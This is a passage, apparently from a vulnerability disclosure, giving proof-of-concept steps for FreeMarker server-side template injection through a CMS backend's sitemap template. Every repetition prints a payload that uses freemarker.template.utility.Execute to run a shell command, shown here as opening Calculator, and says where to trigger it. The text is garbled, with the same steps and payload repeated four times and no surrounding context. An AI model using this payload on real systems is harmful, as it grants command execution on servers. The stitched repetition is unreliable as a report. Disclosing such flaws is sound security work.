2. The vulnerability point is in the backend website management-template management department. Find the `TM_SITEMAP_HTML` file and write it into the POC.
```
<#assign value="freemarker.template.utility.Execute"?new()>${value("open -a Calculator")}
2. The vulnerability point is in the backend website management-template management department. Find the `TM_SITEMAP_HTML` file and write it into the POC.
```
<#assign value="freemarker.template.utility.Execute"?new()>${value("open -a Calculator")}
3.After saving, visit the homepage to find the site map below and click to trigger. You can also directly access /sitemap.html to trigger the vulnerability.
2. The vulnerability point is in the backend website management-template management department. Find the `TM_SITEMAP_HTML` file and write it into the POC.
```
<#assign value="freemarker.template.utility.Execute"?new()>${value("open -a Calculator")}
3.After saving, visit the homepage to find the site map below and click to trigger. You can also directly access /sitemap.html to trigger the vulnerability.
2. The vulnerability point is in the backend website management-template management department. Find the `TM_SITEMAP_HTML` file and write it into the POC.
```
<#assign value="freemarker.template.utility.Execute"?new()>${value("open -a Calculator")}
3.After saving, visit the homepage to find the site map below and click to trigger. You can also directly access /sitemap.html to trigger the vulnerability.
